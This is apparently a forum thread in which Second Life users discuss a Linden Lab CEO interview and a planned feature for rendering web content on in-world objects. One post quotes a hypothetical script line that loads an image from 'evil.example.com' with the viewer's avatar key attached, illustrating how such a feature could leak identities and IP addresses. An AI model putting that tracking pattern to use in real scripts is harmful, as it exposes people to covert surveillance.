Why? Because he doesn't realize that SL isn't *like* the Web. When I'm at a place in SL, I'm *there*, people can *see me there*. In internet terms, it's like everyone has perfect cross-zone web-bug cookies enabled all the time.

For people outside the US who call the game "Rounders", Taco's image is a "softball".

Yeah - they talk about it.. they talk about it quite a lot... in fact they've been talking about html on a prim for... how long now? 4 years or so?

They can talk about it forever as far as I'm concerned, so long as they don't actually implement it.

After reading the entire interview I have to say it's like his other interviews ... he's an empty suit. I didn't see anything remarkable in what he said or said the Lab would be doing in the near future.

Doodles: Saw those, knew they'd come up here... wondered how long it would take for someone to psychoanalyze them. I didn't zoom on the thumbnails, but it sure looked like a lot of tiny colored boxes to me.

To be fair as I was trying to indicate above, he wasn't asked anything that would require a remarkable answer. The only thing that interview missed was "What's your favorite boy band?" and "What kind of lunches do you like best?"

Hopefully they just keep floundering and not crash sl totally till the next 3d world is up and running.
A 3d net will be the next thing.. but LL wont be able to bring it here.

That's true, but a remarkable individual with new and cutting edge ideas would have driven the conversation to new and interesting topics. Kingdon didn't.

Such an individual should never (nix that: unbelievably rarely) be allowed to be the CEO of a business.

I tend to look at all the rehashings of xytext, the lots n lots n lots of scripts used to think why something like that would be pretty cool.

I wouldn't mind being able to say llRenderHtml(face, "<B>Hello World</b>");

I don't want to see llRenderURL(face, "http://evil.example.com/ipstealer.jpg?uuid="+lldetectedKey(0));

I took that interview as just more coprorate speak, akin to a greasy salespitch from a used car salesman.

Yes, but there are a couple interesting bits in there...

Quote:
Yes. In the past, the company didn't publish roadmaps or issue a long-term plan. In fact, the work approach was more "wisdom of the crowds," more self-directed, more spontaneous. That approach created the staggering platform we know and love.

As we move to the next level of growth, and we reach 400 then 500 people in the Lab, our approach to how we work will necessarily evolve. In fact it is evolving now.
Back in 2007 and some parts of 2008 this was my biggest concern about LL: that they did not have a coherent plan for moving forward, and improvements to SL came as people (lab employees) self-selected something to work on. While this approach can yield some fantastic innovation, it's no way to run a company that actually has to support and administer a virtual world.

My gut feeling has been that at some point in the past year LL changed directions, and this snippet confirms my gut level observations. This is a good thing - it means the Lindens DO know where we are going, even if they aren't sharing.

A super lightweight experience to complement the immersive one that let's people dip their toes in and see what it's like to attend a concert, go to a meeting, chat with a friend, etc. without going through the full registration, download, and orientation process.
Wow. I said almost this exact same thing the other day in the "Mass-marketing Second Life" thread. Providing this simplified functionality will really help SL gain "market share" by making it easier to learn and more approachable for first-time users.

Quote:
In the nearer term, we have more 'concrete' goals that move us towards our ideal. First off, we need to make Second Life much more accessible to a wide audience. It has to be a delightful experience. Internet easy. Intuitive. Second nature. It also has to be a rational experience with great tools for finding and discovering the people, places and things that matter to you. And, it needs more social tools so you can connect easily with others.
More indication that the Lab's focus is in the right places. The grid has been mostly been stabilized, and all the system-critical issues have been (mostly) resolved. Now it's time to redirect some focus towards improving the social-networking tools inside SL, while still working on technical issues.

I disagree that M is an "empty suit". The changes since he took over are not really prevalent on the grid, but his influence definitely shows when we're provided a peak inside LL.

For me it's more like they know where THEY want to go, but do they know how to get there? And, is it someplace we want to go too?

My opinions haven't changed much. Since M,M and T took over, SL has stabilized technically, but from a general business and social administrative and management perspective, they are as inept as ever. If not more so.

I don't think M is an empty suit...M, not , M....I just don't particularly care for what is inside the suit.

It looks like we will getting the second one. Pretty much, parcel media without the parcel.

I will not enable it. If there is no way to disable it I will build a fucking client without it even implemented and distribute it as the Privacy Viewer.
